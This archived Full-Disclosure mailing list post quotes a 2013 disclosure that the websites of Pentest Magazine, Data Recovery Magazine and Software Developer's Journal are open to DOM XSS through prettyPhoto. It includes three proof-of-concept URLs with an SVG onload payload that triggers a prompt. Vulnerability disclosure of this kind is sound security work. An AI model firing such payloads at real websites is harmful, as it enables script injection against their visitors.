| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <20130929142741.8ED37C04A7@smtp.hushmail.com>
Date: Sun, 29 Sep 2013 08:27:41 -0600
From: silence_is_best@...hmail.com
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Pentest Mag, Data Recovery Magazine,
and Software Developer's Journal Vulnerable to DOM XSS
LoL...$180 a year...sham.
On 09/29/2013 at 8:13 AM, "Jay Turla" wrote:I have been annoyed
lately by the staffs of Pentest Magazine because of their spam
promotions and "Would you write for Us" inquiries despite saying no to
their proposals. I don't like to write for them because they don't
offer their services for free (Also they sell their magazines to other
people yet they don't pay their writers - no just compensation ). So
here is my full disclosure of Pentest Magazine, Data Recovery
Magazine, and Software Developer's Journal which are all from the same
company or somehow related. The official websites of the magazines
mentioned are all vulnerable to DOM XSS because of the prettyPhoto js.
PoC:http://datarecoverymag.com/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/
http://pentestmag.com/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/
http://sdjournal.org/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/
Attached are my screenshots.
P.S. No harmed was done!
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists